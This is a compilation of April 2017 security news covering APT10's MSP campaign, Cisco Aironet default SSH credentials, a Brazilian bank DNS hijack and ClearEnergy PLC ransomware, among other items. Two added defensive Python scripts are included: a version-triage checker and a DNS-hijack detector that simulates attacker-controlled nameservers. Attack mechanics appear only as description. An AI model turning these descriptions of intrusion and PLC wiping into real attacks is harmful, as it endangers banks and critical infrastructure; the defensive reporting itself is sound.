In September 2015, the company said that the collected data was meant to improve the overall user experience. Only months before, the company had boosted data collection in Windows 7 and Windows 8.

In January this year, the company took the wraps off a privacy dashboard, meant to provide users with increased visibility and control over the data collected by Microsoft services, and even allows them to clear the collected data if they want to.

At the time, Microsoft also revealed that Windows 10 Creators Update will simplify Diagnostic data levels, reduce data collected at the Basic level, and present only two data collection options to users: Basic and Full. The platform update will also bring increased privacy settings, Microsoft said in early March.

Only one week before Windows 10 Creators Update starts rolling out to users, Microsoft decided to provide specific information on the type of data it will be gathering from users’ computers based on the collection level selected.

“The Basic level gathers a limited set of information that is critical for understanding the device and its configuration including: basic device information, quality-related information, app compatibility, and Windows Store,” Microsoft’s Brian Lich explains.

Security-related information is also collected as part of the Basic level, and all of the gathered information is meant to help identify problems that can occur with a particular device's hardware or software configuration.

When it comes to the Full level, the type of collected data expands dramatically beyond the data gathered in the Basic level, to include device, connectivity, and configuration data; products and services usage data; software setup and inventory data; browsing, search and query data; typing and speech data; and licensing and purchase data.

Thus, users who opt in to this data collection level will allow their Windows 10 machine to send information such as OS version, user ID, Xbox user ID, device ID, device properties and capabilities, app usage, device health and crash data, device performance and reliability data, device preferences and network info, installed applications, content consumption data, and information on purchases made on the device.

Facing increased scrutiny over its data collection practices, Microsoft appears determined to become more transparent on the matter, so as to ensure it doesn’t run into too much trouble, especially in the European Union, which last year started investigating the tech giant on user privacy-related issues. For that, the company also published a privacy statement.


Operation Cloud Hopper: China-based Hackers Target Managed Service Providers

6.4.2017 securityweek CyberCrime
Operation Cloud Hopper Targets Managed IT Service Providers and Their Clients

A widespread campaign known to be targeting managed service providers (MSPs) in at least fourteen countries has been tied to the group known as APT10 and is thought to be operating out of China. These are the conclusions of a new report published this week by PwC UK and BAE Systems.

As always with such reports, attribution is down to the weight of circumstantial evidence. The authors detail historical evidence that leads towards APT10, and domain registration timing evidence that suggests operation from within China's timezone. The authors do not suggest that APT10 is state-controlled, but they paint a picture that invites a conclusion that it is at least state-sponsored.

Part of the historical evidence includes an overlap in malware used in attacks previously attributed to APT10. The group is believed to have primarily used Poison Ivy before switching to PlugX, with both in use for a period of about nine months. From around mid-2016 it started to 're-tool' and is now using PlugX, ChChes, Quasar and RedLeaves.

There are two big takeaways from this report (PDF): the reality that organizations are still not adequately securing their supply chain; and the potential that the US/China and UK/China agreements to curb economic espionage are now defunct.

The authors describe a campaign that uses well-researched spear-phishing to first compromise MSPs. From here they obtain legitimate credentials to access the MSPs' client networks that align to APT10's targeting profile -- which the authors claim aligns with China's current five-year plan (FYP) for economic growth.

Once on the target network, the attacker moves laterally to locate specific data of interest. This is collected and compressed before being moved back to the MSP and finally sent to a server under the attackers' control. This is a classic supply-chain attack, similar in concept to the iconic Target breach. Organizations are generally getting better at their own security but remain slack over the security of their suppliers -- in this case, their MSPs.

"It is fundamental for organizations to come to terms with the fact that raising their own security posture is essential but not sufficient," warns Donato Capitella, senior security consultant at MWR InfoSecurity; "especially if they are then willing to interweave their IT systems with third parties whose security posture is insufficient. Organizations have to mandate higher security standards if they do not want to see all of their security investment undermined by trivial security mistakes on behalf of their partners. At the same time, third parties that can demonstrably step up their security game will become preferred over time and will undoubtedly have a higher chance to win important contracts in the future."

The question of whether the US and UK accords with China over economic espionage are now defunct is posed, but not answered, by the study. The US and UK are only two of fourteen countries affected, so they are not specifically targeted. It is MSPs in all of those countries that are the targets; and we are not told of any specific client organizations breached.

The two accords specify 'economic espionage'; political espionage is still acceptable in both directions. It is perfectly possible, if not likely, that MSPs compromised in America and Britain have not been used for economic gain. Without further information from the authors, we simply do not know.

It is likely that the attackers are the group known as APT10, and it is likely that they are based in China -- but unambiguous attribution and motivation is not possible based on this report. "Overall," comments Israel Barak, CISO of Cybereason, "the notion that China has decreased its efforts since 2015 to conduct economic espionage is preposterous. China is known for using cutouts and sympathetic agents to collect information on their behalf. China, Russia and other nation states frequently outsource wholesale hacking operations to individual groups and companies. In addition to their government services, these companies contract with, and provide services to, other clients. To do otherwise would greatly devalue the plausible deniability that is one of the major benefits of outsourcing. There are many reasons there is an uptick in outsourcing of operations because countries can rapidly expand capabilities in a short period of time, increase plausible deniability of actions, mitigate risk of detection, gain technical expertise that they cannot recruit directly into the government and decrease overall operational costs."

But whether this indicates the end of the two China accords is a different matter. "The most significant challenge for investigators in the UK or US is tying digital activity to a person and organization in this massive breach or any breach for that matter. In reality, we live in a world where as more and more state-sponsored activity is being conducted by corporations, attribution gets even more difficult. To reiterate, it is too early in this particular instance to determine whether the Cameron-Xi accord was broken or whether it is simply a case of competitive intelligence and cybercrime that must be dealt with bilaterally between Great Britain and China."


Národní bezpečnostní úřad to add twenty experts for defence against cyber attacks

6.4.2017 Novinky/Bezpečnost Cyber
The National Security Authority (Národní bezpečnostní úřad, NBÚ) will shortly add twenty experts to protect state authorities from cyber attacks. The plan comes from a proposal by Prime Minister Bohuslav Sobotka (ČSSD) that the government approved on Wednesday. The new employees are to give the authorities methodological guidance, help with prevention and consult with them on problems.
Authorities, including those not covered by the Cyber Security Act, will be able to ask the NBÚ for an analysis of the security of their systems, proposals for improvement or special training. "The experts will form teams providing comprehensive methodological support to specific entities that request it, which is a new task the government has assigned to the authority," Sobotka said.

The newly created positions are to be filled by specialists in operating systems, computer networks, applications and mobile communications, professional auditors and staff focused on the legal regulation of cyber security.

When the planned split of the NBÚ takes place, the new employees are to move to the National Cyber and Information Security Authority (Národní úřad pro kybernetickou a informační bezpečnost). The new authority is being set up by the government commissioner for this area, Dušan Navrátil. Its legal basis is to be laid by an amendment to the revised Cyber Security Act, which members of parliament will vote on at their April session.

The cyber centre is meant to protect the Czech Republic from hacker attacks and other security threats. It will be built in part of the former barracks in Brno, Černá Pole. It should eventually employ 400 people. Cyber attacks on critical or important information infrastructure have been on the rise in recent years. The government team GovCERT records roughly 100 security incidents a month.

On Wednesday the cabinet also heard a report on the state of the Czech Republic's cyber security for last year, Sobotka said.


Lior Tabansky: Russia and Israel are the best at attacking in cyberspace
6.4.2017 Lupa.cz Cyber

An Israeli cyber-security expert talks about the future of attacks and developments in his country.
Lior Tabansky served in an elite technical unit of the Israeli Air Force and has for years focused on cyber security across academic, private and government activities. He works at Tel Aviv University and published the book Cybersecurity in Israel. In an interview for Lupa he also talks about countries' ability to attack actively in cyberspace and how to prepare for the future.

Israel is one of the world's great powers in cyber security. In the Czech Republic we often think the same of ourselves. Are we right?
There is no reason why the Czech Republic should not be one of the world leaders. Israel's success is the result of many years of investment in research and development, academia, applied research, military research. All of this created an ecosystem, people's knowledge and institutions, which produces innovation quickly and efficiently. For a country with the same high level of economic development, there is no reason why it could not change its internal rules and increase its competitiveness and innovation.

Can you give me examples of some interesting cyber-security companies from the Czech Republic that you know of?
Not really. I don't do market surveys; I am interested in the rules and policy above them.

So how do you come into contact with the Czech Republic?
We have productive cooperation in the area of cyber rules and policies. Both countries cooperate well and have common interests in this area.

[Photo: Lior Tabansky. Author: Jan Sedlák]
How can one cooperate in cyber security? NATO itself, for example, says that in this area every country is essentially on its own.
Yes, when an attack comes, you are on your own. I am talking about cooperation not in attacks, though that can exist too, but in building rules. There is a lot of activity in this regard. The Czech embassy in Israel even has its own attaché for cyber security. There is also cooperation between private companies and governments.

Nowadays cyber interventions between countries are routine, a kind of hybrid war is being waged, and so on. Do you think such activities mean that armed conflicts do not have to be fought right away?
If today you want to achieve something against countries that have good defences, typically Western countries, it makes no sense to go against their strengths and use tanks, for instance. It is better to find alternative strategies. The history of warfare shows that. So this area will grow stronger in the future and exploit moments of surprise.

Which countries are best at these cyber interventions?
That is hard to measure. One thing is what capabilities or equipment a country has, and another is what it actually achieves with them, what results it gets. Combining the two, Russia and Israel are best. In any case the potential of many other countries is great. They can very quickly develop capacities and the necessary strategies.

So should countries have active cyber-attack capabilities?
There is no difference between attack and defence; it is the same capability. Every company will tell you it does defence, but technically it is the same capability. Within an organisation you need certain changes for attacks, but the foundations are the same. You cannot do good defence if you do not understand how attacks work. Every company that offers defensive solutions has very good knowledge and capabilities in attacking.

Recently in the Czech Republic we have been debating whether to give military intelligence the ability to actively monitor activity on networks, precisely with a view to possible active intervention. Should such organisations have such powers?
That is a very complicated debate; it is a big issue in cyber-security policy. How to balance security and freedom. There is no formula that fits all countries. Every country has to go through its own debate.

And would you have any advice for our country in this regard?
The main advice is that before you implement anything, decide at the highest level what you want to do in the future and what exactly you are aiming at. What the critical components of security are, what the biggest real threats are. Unfortunately this is often not prepared. Organisations face current threats and apply rules to them.

If someone attacked our country with a cyber attack, is that an act of war? What can it be considered, and how should one respond?
That is hard to define. That is exactly why we should be very flexible in our thinking. Wars keep changing, but we stay stuck thinking in old definitions. In cyberspace you can see a lot of cooperation between organised cybercrime and state bodies. They cooperate on targets that serve both sides: financial gain for the cybercriminals and political gain for state-sponsored attacks. There is no simple path to definitions, to a unified doctrine.

Is it even possible for law and regulation to respond, at least partly, as fast as cyberspace and the threats in it evolve?
That is a big problem. In Israel we came to the conclusion that there is no single solution or concept. We are trying to build a cyber-security ecosystem that includes academic institutions, the private sector and the government. The goal is to build an ecosystem able to adapt much faster than traditional government processes. We are trying to get the private sector to be able to adapt proactively on its own without waiting for action from above, from the government. Changes happen terribly fast and it is impossible to keep up with them through traditional governance.

The internet began as, and for a long time was, a very free environment, but now it faces ever greater attempts at regulation. Security is one of the main arguments. What developments can we expect next?
It is very tempting to add more state regulation, both of content and of infrastructure. The only way to balance everything is to have an open democratic debate and oversight of what governments do. There are not many other ways.

In the book Cybersecurity in Israel you analyse in more detail why and how your country is good at cyber security. It is the research and development already mentioned, long-term investment, the links between government, private and academic components. How big an influence do companies like Check Point then have on the whole environment?
Large companies play a considerable role in all of that. But in the long term I am more interested in the people. It does not matter at all that most startups fail and burn money. The good side is that people gain more experience and are willing and able to invest it in the next idea. That is what is behind the future of our innovation. If you wanted to measure it in sales and deals, that is of course a different story.

Large companies are role models, but they are not the only ones. If a Check Point makes 1.7 billion dollars in revenue a year, there are also young companies that sell for billions of dollars or hundreds of thousands of dollars. And in Israel there are not a few of them. That is also a "big deal" (laughs).

In cyber security there has for some time been debate about the possible use of blockchain. Do you see anything interesting yet?
At Tel Aviv University we have several interesting research activities. Most of them cannot yet be used for anything in production; they are the basics. It is too early to say much more; it needs a lot of development and the market will have to find out how to use and work with it all. The potential is there, but it still has to be researched and experimented with. We do not know how it will work.

And what about artificial intelligence? Check Point founder and CEO Gil Shwed told me in an interview that it is not possible to operate in this field without AI.
That is quite right. The main advantage of computers is that they can automate many tasks. We are and will be able to free people from basic operations and let them work on innovative and creative things. Cyber security is about data, a lot of data. For that you need machine processing.

Can AI in cyber-security technologies have any impact on legislation and everything around it? What if AI affects international affairs?
Yes, that is a problem for the law. That is why we separate robotics, AI and automation from executive decisions. A warplane today can essentially attack on its own, and so on, but we still leave those decisions to humans. Precisely because of the problems you mention.

Can all the emerging things like the Internet of Things, robotics, Industry 4.0 and so on significantly change the view of cyber security?
Theoretically yes, there will be some profound changes. But the response will be essentially the same. We know changes are coming and we do not know what the solution is. The best chance of coping with that is to have a system that develops rapidly and adapts. That is the ideal model. But of course there will be a lot of work around it: dealing with laws, economic implications and so on.


Microsoft Finally Reveals What Data Windows 10 Collects From Your PC
6.4.2017 thehackernews Privacy
Since the launch of Windows 10, there has been widespread concern about its data collection practices, mostly because Microsoft has been very secretive about the telemetry data it collects.
Now, this is going to be changed, as Microsoft wants to be more transparent on its diagnostics data collection practices.
Until now there have been three options (Basic, Enhanced, Full) for Windows 10 users to select from under its diagnostics data collection section, with no option for users to opt out of sending their data to Microsoft.
Also, the company has never said precisely what data it collects behind these options, which raised huge privacy concerns among privacy-conscious users.
But now for the first time, Microsoft has revealed what data Windows 10 is collecting from your computer with the release of the Windows 10 Creators Update, bringing an end to nearly two years of its mysterious data collection practices.
The Windows 10 Creators Update, which will be available from April 11 for users to download for free, comes with a revamped Privacy settings section.

During the upgrade to the Creators Update, you will be shown a new Privacy Settings screen that asks you to toggle the following features:
Location – Allow Windows and apps to request your location and share that data with Microsoft.
Speech Recognition – Allow Cortana and Windows Store apps to recognize your voice and send that data to Microsoft to improve speech recognition.
Tailored experiences with diagnostic data – Allow Microsoft to use diagnostic data from your computer to offer tips and recommendations.
Relevant ads – Allow apps to use advertising IDs to show ads more interesting to you based on your app usage.
What's more, on Wednesday Microsoft published a detailed list of diagnostics data, for both the Basic and Full levels, on its TechNet site, showing what data gets collected.
Basic – The Basic level collects a limited set of data that is critical for understanding the device and its configuration. This data includes basic device information, quality-related information, app compatibility, and Windows Store.
Full – The Full level collects data in nine categories, including: common data; software setup and inventory data; product and service usage data; browsing, search and query data; content consumption data; linking, typing, and speech utterance data; and licensing and purchase data.

Windows chief Terry Myerson said in a blog post published Wednesday that Microsoft hoped the transparency would allow users to make "more informed choices" as the company starts rolling out its new Creators update to the operating system.
This increased transparency about diagnostic data, two years after the Windows 10 release, is likely Microsoft's response to European Union regulators, who have been publicly pressuring the company about its privacy practices for the past year.
In February, European Union regulators said they were still unsatisfied with the privacy changes announced by Microsoft and were seeking further clarification from the company.
Marisa Rogers, the privacy officer of the Microsoft's Windows and Devices Group, said that the company is planning to "share more information about how [it] will ensure Windows 10 is compliant with the European Union's General Data Protection Regulation."


No More Ransom — 15 New Ransomware Decryption Tools Available for Free
6.4.2017 thehackernews Virus
No More Ransom keeps growing, and so does the ransomware threat it was built to fight.
Launched less than a year ago, the No More Ransom (NMR) project has increased its capacity with new partners and new decryption tools added to its now global campaign to combat Ransomware.
Started as a joint initiative by Europol, the Dutch National Police, Intel Security and Kaspersky Lab, No More Ransom is an anti-ransomware cross-industry initiative to help ransomware victims recover their data without having to pay ransom to cyber criminals.
The website not only educates computer users on protecting themselves from ransomware, but also provides a collection of free decryption tools.
Since December, more than 10,000 victims from all over the world have been able to recover their encrypted files without spending a penny, using the ransomware decryption tools available free of charge on the platform.
Statistics show that most of the website visitors were from Russia, the Netherlands, the U.S., Italy, and Germany.
The platform is now available in 14 languages and hosts 40 free decryption tools, supplied by a range of member organizations, which can be used by users to decrypt their files which have been locked up by given strains of ransomware.

The No More Ransom initiative has been joined by thirty new organizations, including Avast, CERT Polska and Eleven Paths (the Telefonica Cyber Security Unit), which shows that the threat is a worldwide issue that needs to be fought together.
The initiative has also welcomed new law enforcement organizations from Interpol, Australia, Belgium, Israel, South Korea, Russia, and Ukraine.
Since December 2016, 15 new ransomware decryption tools have been added to the online portal by partner organizations, offering more decryption possibilities to the victims:
AVAST: Alcatraz Decryptor, Bart Decryptor, Crypt888 Decryptor, HiddenTear Decryptor, Noobcrypt Decryptor and Cryptomix Decryptor
Bitdefender: Bart Decryptor
CERT Polska: Cryptomix/Cryptoshield Decryptor
CheckPoint: Merry X-Mas Decryptor and BarRax Decryptor
Eleven Paths (Telefonica Cyber Security Unit): Popcorn Decryptor
Emsisoft: Crypton Decryptor and Damage Decryptor
Kaspersky Lab: updates to the Rakhni and Rannoh Decryptors
Previously available in English, Dutch, French, Italian, Portuguese and Russian, the No More Ransom site has now added new languages including Finnish, German, Hebrew, Japanese, Korean, Slovenian, Spanish and Ukrainian.
More languages are also expected to be made available soon to assist victims across the world better.


Cisco Patches Critical Flaw in Aironet Access Points

6.4.2017 securityweek Vulnerability
Cisco published an advisory on Wednesday to warn customers that some of the company’s Aironet access points are affected by a critical flaw that could allow an attacker to take complete control of a vulnerable device.

The security hole, tracked as CVE-2017-3834, involves the existence of default credentials that can be used by a remote attacker who has layer 3 connectivity to log in to a device with elevated privileges via SSH.

The vulnerability impacts Cisco Aironet 1830 and 1850 series APs running an 8.2.x version of the Mobility Express software prior to 8.2.111.0. The company pointed out that the weakness can be exploited regardless of whether the device is configured as a master, subordinate or standalone AP.

Cisco has also informed customers of a medium severity shell bypass vulnerability affecting Aironet 1800, 2800 and 3800 series APs. A local attacker with root privileges can exploit the flaw to gain root access to the underlying Linux operating system. This root shell is designed only for advanced troubleshooting and it should not be available to any user, even if they have root privileges.

The networking giant has also published advisories detailing three high severity denial-of-service (DoS) vulnerabilities affecting its Wireless LAN Controller (WLC) software.

These security holes affect the Wireless Multimedia Extensions (WME), IPv6 UDP ingress packet processing, and the web management interface components of the WLC software. Remote or adjacent attackers can exploit the flaws without authentication.

Cisco has released software updates for each of the affected WLC versions. Workarounds are not available.

Most of these vulnerabilities were discovered by Cisco itself and the company said there was no evidence of exploitation in the wild.


Be careful, Cisco Mobility Express, shipped with some Cisco Aironet devices, has a hard-coded password. Fix it!
6.4.2017 securityaffairs Vulnerability

The Mobility Express Software shipped with Cisco Aironet 1830 Series and 1850 Series access points has a hard-coded admin-level SSH password.
Yesterday I wrote about SCADA systems that are currently shipped with an unchangeable hard-coded password, and today I'm here to discuss a similar problem with you.

The Mobility Express Software developed by Cisco and shipped with Aironet 1830 Series and 1850 Series access points has a hard-coded admin-level SSH password.


The default credentials can be used by any remote attacker who has layer 3 connectivity to an affected device.

“A vulnerability in Cisco Aironet 1830 Series and Cisco Aironet 1850 Series Access Points running Cisco Mobility Express Software could allow an unauthenticated, remote attacker to take complete control of an affected device.” reads the security advisory. “The vulnerability is due to the existence of default credentials for an affected device that is running Cisco Mobility Express Software, regardless of whether the device is configured as a master, subordinate, or standalone access point. An attacker who has layer 3 connectivity to an affected device could use Secure Shell (SSH) to log in to the device with elevated privileges. A successful exploit could allow the attacker to take complete control of the device”

To discover which release of Cisco Mobility Express Software is running on your device, use the Cisco Mobility Express wireless controller web interface or the CLI.
In the web interface, the release number is shown under Management > Software Update.

The security advisory published by the company is part of a wider set that addresses security issues in the Aironet 1830/1850 series.

The problem affects every access point running the 8.2.x release of Cisco Mobility Express Software prior to Release 8.2.111.0., regardless of whether the device is configured as a master, subordinate, or standalone access point.

Cisco has released free software updates that fix the flaw described in the advisory. Note that customers may only install and receive support for software versions for which they have purchased a license.

Other security issues related to the Aironet technology are:

An input validation bug in the Cisco Wireless LAN Controller (WLC);
An IPv6 UDP denial-of-service (DoS) vulnerability in the WLC; and
A DoS vulnerability in the WLC’s management GUI.
Cisco has already issued security fixes to patch the above problems.
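Both Cisco items above state the same affected range: Aironet 1830 and 1850 series APs running Mobility Express 8.2.x earlier than 8.2.111.0, in any role (master, subordinate or standalone). The script below triages an AP inventory against that range. It is an added example for this digest, not Cisco tooling; the inventory entries are constructed. The point worth noticing is that release strings must be compared numerically: as plain strings "8.2.99.0" sorts after "8.2.111.0", which would wrongly mark an affected AP as fixed.

```python
"""Triage an access-point inventory against the affected range in the Cisco
Aironet 1830/1850 Mobility Express advisory (8.2.x before 8.2.111.0).
Added example, not Cisco code; the inventory below is constructed."""
from typing import Dict, List, Tuple

FIRST_FIXED = (8, 2, 111, 0)
AFFECTED_SERIES = {"1830", "1850"}


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '8.2.110.0' into (8, 2, 110, 0) so comparison is numeric."""
    parts = version.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"cannot parse version {version!r}")
    return tuple(int(p) for p in parts)


def is_affected_release(version: str) -> bool:
    """True for 8.2.x releases before 8.2.111.0, as the advisory states.
    Other trains are outside what the advisory describes and come back False;
    that is 'not in scope', not a certificate of safety."""
    v = parse_version(version)
    return v[:2] == (8, 2) and v < FIRST_FIXED


def triage(inventory: List[Dict[str, str]]) -> List[str]:
    """Hostnames that need the Mobility Express update.  The AP role is
    ignored on purpose: the advisory says every role is exposed."""
    return [ap["host"] for ap in inventory
            if ap["series"] in AFFECTED_SERIES and is_affected_release(ap["version"])]


INVENTORY = [  # constructed entries, not a real estate
    {"host": "ap-lobby-1", "series": "1830", "version": "8.2.110.0", "role": "master"},
    {"host": "ap-floor2-3", "series": "1850", "version": "8.2.99.0", "role": "subordinate"},
    {"host": "ap-lab-1", "series": "1850", "version": "8.2.111.0", "role": "standalone"},
    {"host": "ap-warehouse", "series": "2800", "version": "8.2.110.0", "role": "subordinate"},
]

if __name__ == "__main__":
    for host in triage(INVENTORY):
        print(f"{host}: update Mobility Express to 8.2.111.0 or later")
```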


United Cyber Caliphate published a kill list of 8,786 individuals in US, UK
6.4.2017 securityaffairs CyberCrime

Members of the pro-ISIS hacker group United Cyber Caliphate (UCC) have released a new kill list with 8,786 targets in the US and UK.
The pro-ISIS hacking group United Cyber Caliphate (UCC) has released a “kill list” containing the names and addresses of 8,786 individuals in the U.S. and UK. The group published a shocking video online calling for lone wolf attacks on the individuals in the list.

“Kill them wherever you find them.” states the message published by the United Cyber Caliphate (UCC).

The video starts with a warning for the United States:

“We have a message to the people of the U.S. and most importantly your President Trump,” the text on the screen reads.

“Know that we continue to wage war against you. Know that your counter attacks only make us stronger. The UCC will start a new step in this war against you,” the message said.

According to the terror monitor SITE, the United Cyber Caliphate (UCC) first announced the release of the kill list through a private group on Telegram, then published it a few minutes later.

“More than 7,000 of the names were from the U.S.,” a source from the cyber department at SITE told Fox News on Wednesday.

“We’re trying to determine where the list came from and also identify a common theme among all the individuals,” a spokesman for SITE said.


Intelligence experts are evaluating the real danger to the people included in the kill list. The same group has shared other lists in the past.

“This group has released several ‘kill lists’ in the past and so far there’s been no confirmed incident of someone on the list being directly targeted or attacked,” the source said.

On March 16, 2017, the United Cyber Caliphate (UCC) published a video announcing the death of its leader, Osed Agha, who was killed in a US airstrike. The video promised retaliation for the death of the UCC leader.

Pierluigi Paganini

(Security Affairs – Kill list, United Cyber Caliphate)

Tweet by TRACterrorism.org (@TRACterrorism), 2:05 PM - 19 Mar 2017: “United Cyber Caliphate Announces Death of Osed Agha (Hacker IS Kill-List Creator)” http://ow.ly/1nSU30a2SiQ


Crooks took control over operations of a Brazilian bank for 5 hours
5.4.2017 securityaffairs CyberCrime

Cyber criminals launched a sophisticated cyber heist that compromised the entire DNS infrastructure of a major Brazilian Bank.
A cyber criminal organization took over the online services of a major Brazilian bank for five hours. The attackers compromised the bank’s DNS records and intercepted all connections to the financial institution.

According to Kaspersky Lab, which investigated the incident, the attack was very sophisticated: the attackers used valid SSL certificates and Google Cloud infrastructure to host the phony bank sites.


Kaspersky Lab did not disclose the name of the bank. The crooks took over 36 domains belonging to the bank, including internal email and FTP servers.
The attackers gained control of the bank’s DNS account after compromising its Domain Name Service (DNS) provider, Registro.br.

It is still unclear how the attackers compromised the DNS provider, but the experts believe the intrusion began at least five months before the day of the hijack.

The attack occurred on October 22, 2016 and lasted five hours, during which the attackers captured the transactions of hundreds of thousands, possibly millions, of the bank’s customers worldwide. Customers who tried to access the bank’s online services were served malware posing as a Trusteer banking security plug-in.

The malware was designed to disable victim’s security solutions and steal login credentials, email contact lists, and email and FTP credentials.

The experts said it was the first time they had observed an attack of this scale.

“As far as we know, this type of attack has never happened before on such a big scale,” explained Dmitry Bestuzhev, director of Kaspersky Lab’s research and analysis team in Latin America.

Kaspersky’s experts noted that Registro.br fixed a cross-site request forgery flaw on its website in January; it is possible the attackers exploited that flaw.

“Maybe they [the attackers] exploited the vulnerability on that website and got control. Or … We found several phishing emails targeting employees of that registrar, so they could have spear-phished them,” added Bestuzhev. “We don’t know how exactly they originally compromised” the DNS provider, he says.

A disconcerting aspect of the story is that the Brazilian bank had not enabled the two-factor authentication option offered by Registro.br for its account.
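A check that would have shown the hijack as it started: a periodic snapshot of the bank’s own delegation and host records, diffed against a baseline, with special attention to address space the bank does not own (here, the attackers parked the fake sites on a third-party cloud). This is an added example written for this page, not Kaspersky’s or the bank’s tooling; the zone names, addresses and owned prefix are constructed documentation values, and in practice the observed snapshot would come from several external resolvers rather than being hard-coded.

```python
import ipaddress

# Constructed baseline of the records the bank's zone is expected to carry.
# Names and addresses are documentation values (RFC 2606/5737), not the real bank's.
BASELINE = {
    "www.example-bank.com.br": {
        "NS": {"ns1.example-bank.com.br", "ns2.example-bank.com.br"},
        "A": {"203.0.113.10"},
        "MX": {"mail.example-bank.com.br"},
    },
    "ftp.example-bank.com.br": {
        "NS": {"ns1.example-bank.com.br", "ns2.example-bank.com.br"},
        "A": {"203.0.113.20"},
        "MX": set(),
    },
}

# Address space the bank actually operates; anything else is someone else's cloud.
OWNED_PREFIXES = [ipaddress.ip_network("203.0.113.0/24")]


def diff_dns_snapshot(baseline, observed, owned_prefixes):
    """Compare a fresh resolution snapshot against the baseline.

    Returns a list of (name, finding, detail) tuples; an empty list means the
    zone still looks the way the bank expects.
    """
    findings = []
    for name, expected in baseline.items():
        got = observed.get(name)
        if got is None:
            findings.append((name, "NO_ANSWER", "baseline name did not resolve"))
            continue
        # Delegation or mail-routing changes are the registrar-level takeover signal.
        for rtype in ("NS", "MX"):
            if got.get(rtype, set()) != expected.get(rtype, set()):
                findings.append((name, f"{rtype}_CHANGED",
                                 f"expected {sorted(expected.get(rtype, set()))}, "
                                 f"got {sorted(got.get(rtype, set()))}"))
        # New A records are graded by whether they still point into owned space.
        for addr in got.get("A", set()) - expected.get("A", set()):
            ip = ipaddress.ip_address(addr)
            if any(ip in net for net in owned_prefixes):
                findings.append((name, "A_CHANGED_IN_OWNED_SPACE", addr))
            else:
                findings.append((name, "A_OUTSIDE_OWNED_SPACE", addr))
    for name in observed.keys() - baseline.keys():
        findings.append((name, "UNEXPECTED_NAME", "not in baseline"))
    return findings


def hijack_example():
    """Constructed snapshot reproducing the pattern in the article: delegation moved
    to attacker-controlled nameservers, hosts now resolve into a third-party cloud."""
    observed = {
        "www.example-bank.com.br": {
            "NS": {"ns1.attacker.example", "ns2.attacker.example"},
            "A": {"198.51.100.5"},
            "MX": {"mx.attacker.example"},
        },
        "ftp.example-bank.com.br": {
            "NS": {"ns1.attacker.example", "ns2.attacker.example"},
            "A": {"198.51.100.6"},
            "MX": set(),
        },
    }
    return diff_dns_snapshot(BASELINE, observed, OWNED_PREFIXES)


if __name__ == "__main__":
    for finding in hijack_example():
        print(*finding)
```

Run it from outside the bank’s own network and from more than one resolver: a registrar-level change propagates to the whole Internet, so a snapshot taken on the bank’s LAN, behind a caching resolver, may keep answering with the old records for hours.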

The malicious code targets a specific list of other banks in many countries, including Brazil, US, the UK, Japan, Portugal, Italy, China, Argentina, and the Cayman Islands.

The attackers used a modular malware that could infect both Windows and Mac OSs.

The malware was identified as Trojan-Downloader.Java.Agent; Trojan.BAT.Starter; not-a-virus:RiskTool.Win32.Deleter; and Trojan-Spy.Win32.Agent.

The crooks also launched a phishing campaign against specific bank clients during the five-hour attack.

The stolen information was sent to a server in Canada.

Kaspersky suspects the involvement of a sophisticated Brazilian cybercrime gang.

“They spent five months just waiting. This is not someone who is a newbie,” added Bestuzhev.


ClearEnergy ransomware aims to destroy process automation logic in critical infrastructure, SCADA and industrial control systems
5.4.2017 securityaffairs ICS

Schneider Electric, Allen-Bradley, General Electric (GE) and more vendors are vulnerable to ClearEnergy ransomware.
Researchers at the CRITIFENCE® Critical Infrastructure and SCADA/ICS Cyber Threats Research Group demonstrated this week a new strain of ransomware attack that erases (clears) the ladder logic in Programmable Logic Controllers (PLCs). The ransomware, dubbed ClearEnergy, affects a large range of PLC models from the world’s largest SCADA and ICS vendors, including Schneider Electric Unity series PLCs and Unity OS from version 2.6 onward; PLC models from GE and Allen-Bradley (MicroLogix family) were also found to be vulnerable.

Ransomware is a type of malware that infects computers, encrypts their content with strong encryption algorithms, and then demands a ransom to decrypt the data. “ClearEnergy attack is based on the most comprehensive and dangerous vulnerability ever found in Critical Infrastructure, SCADA and ICS Systems, and affects a wide range of vulnerable products from different manufacturers and vendors. These attacks target the most important assets and critical infrastructure, not just because they are easy to attack but also because they are hard to recover,” says Brig. Gen. (ret.) Rami Ben Efraim, CEO at CRITIFENCE.

In 2016 we saw a rise in ransomware whose victims were businesses or public organizations that had poor security on one hand and, on the other, a high cost of losing business continuity. Last year there were reports of targeted ransomware for PCs and other workstations within critical infrastructure, SCADA and industrial control systems. A month ago, scientists from the School of Electrical and Computer Engineering at the Georgia Institute of Technology simulated a proof-of-concept ransomware attack (LogicLocker), in a limited scope, designed to attack critical infrastructure, SCADA and industrial control systems.

ClearEnergy acts similarly to other ransomware, which infects computers, encrypts their content with strong encryption algorithms and demands a ransom to restore the data, with one major difference: ClearEnergy is designed to target critical infrastructure and SCADA systems such as nuclear and power plant facilities, water and waste facilities, transportation infrastructure and more.

“Despite the codename ClearEnergy, the vulnerabilities behind ClearEnergy ransomware take us to our worst nightmares, where cyber-attacks meet critical infrastructure. Attackers can now take down our electricity, our water supply and our oil and gas infrastructure by compromising power plants, water dams and nuclear plants. Critical infrastructure is the place where terrorists, activists, criminals and state actors can have the biggest effect. They have the motivation, and ClearEnergy shows that they also have the opportunity,” says Brig. Gen. (ret.) Rami Ben Efraim, CEO at CRITIFENCE.

Once ClearEnergy is executed on the victim machine it searches for vulnerable PLCs, grabs the ladder logic from each PLC and tries to upload it to a remote server. Finally ClearEnergy starts a timer that will wipe the logic from all PLCs after one hour unless the victim pays to cancel the timer and stop the attack.

SCADA and industrial control systems have proven weak in recent years against numerous types of attacks that result in loss of service, translating into power outages or sabotage. The damage a ClearEnergy attack can cause to critical infrastructure is high: it can cause a power failure and other damage to field equipment, making recovery slow in most cases and potentially bringing a plant to a halt.

ClearEnergy is based on vulnerabilities CVE-2017-6032 (SVE-82003203) and CVE-2017-6034 (SVE-82003204), discovered by CRITIFENCE security researchers, which disclosed profound security flaws in Schneider Electric’s UMAS protocol. UMAS suffers from critical vulnerabilities in the form of a badly designed protocol session key, which results in authentication bypass. “UMAS is a kernel level protocol and an administrative control layer used in Unity series PLCs and Unity OS from 2.6. It relies on the Modicon Modbus protocol, a common protocol in Critical Infrastructure, SCADA and industrial control systems, and is used to access both unallocated and allocated memory from PLC to SCADA system. What worries our researchers is that it may not be entirely patched within the coming years, since it affects a wide range of hardware and vendors,” says Mr. Eran Goldstein, CTO and Founder of CRITIFENCE.

